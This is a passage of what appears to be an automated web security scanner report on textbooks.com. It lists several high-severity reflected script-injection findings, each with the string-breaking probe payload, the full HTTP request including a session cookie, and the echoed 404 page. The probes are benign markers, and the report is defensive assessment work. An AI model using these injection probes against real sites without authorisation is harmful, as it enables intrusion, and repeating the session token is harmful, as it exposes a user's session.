Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:17 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-WhyTB.php8f32f';ba57205973'

</script>
...[SNIP]...

1.46. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ffa7'%3b0b9bc122078 was submitted in the REST URL parameter 1. This input was echoed as 1ffa7';0b9bc122078 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ISBN1ffa7'%3b0b9bc122078/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3686
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
earchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/ISBN1ffa7';0b9bc122078/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php'

</script>
...[SNIP]...

1.47. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef3ef'%3b15bc4ae2947 was submitted in the REST URL parameter 4. This input was echoed as ef3ef';15bc4ae2947 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ISBN/9780805853223/Peter-Vorderer/ef3ef'%3b15bc4ae2947 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3650
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/ISBN/9780805853223/Peter-Vorderer/ef3ef';15bc4ae2947'

</script>
...[SNIP]...

1.48. http://www.textbooks.com/Search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Search.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71133'%3b1e739ace45d was submitted in the REST URL parameter 1. This input was echoed as 71133';1e739ace45d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Search.php71133'%3b1e739ace45d HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Search.php71133';1e739ace45d'

</script>
...[SNIP]...

1.49. http://www.textbooks.com/affiliates.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /affiliates.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2495c'%3bea95fbe83be was submitted in the REST URL parameter 1. This input was echoed as 2495c';ea95fbe83be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliates.php2495c'%3bea95fbe83be HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3630
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:27 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/affiliates.php2495c';ea95fbe83be'

</script>
...[SNIP]...

1.50. http://www.textbooks.com/buy-textbooks.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7230b'%3bea4586f4bd2 was submitted in the REST URL parameter 1. This input was echoed as 7230b';ea4586f4bd2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /buy-textbooks.php7230b'%3bea4586f4bd2 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/buy-textbooks.php7230b';ea4586f4bd2'

</script>
...[SNIP]...

1.51. http://www.textbooks.com/css/prod5.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/prod5.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a11'%3b9e00a943245 was submitted in the REST URL parameter 1. This input was echoed as 52a11';9e00a943245 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css52a11'%3b9e00a943245/prod5.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
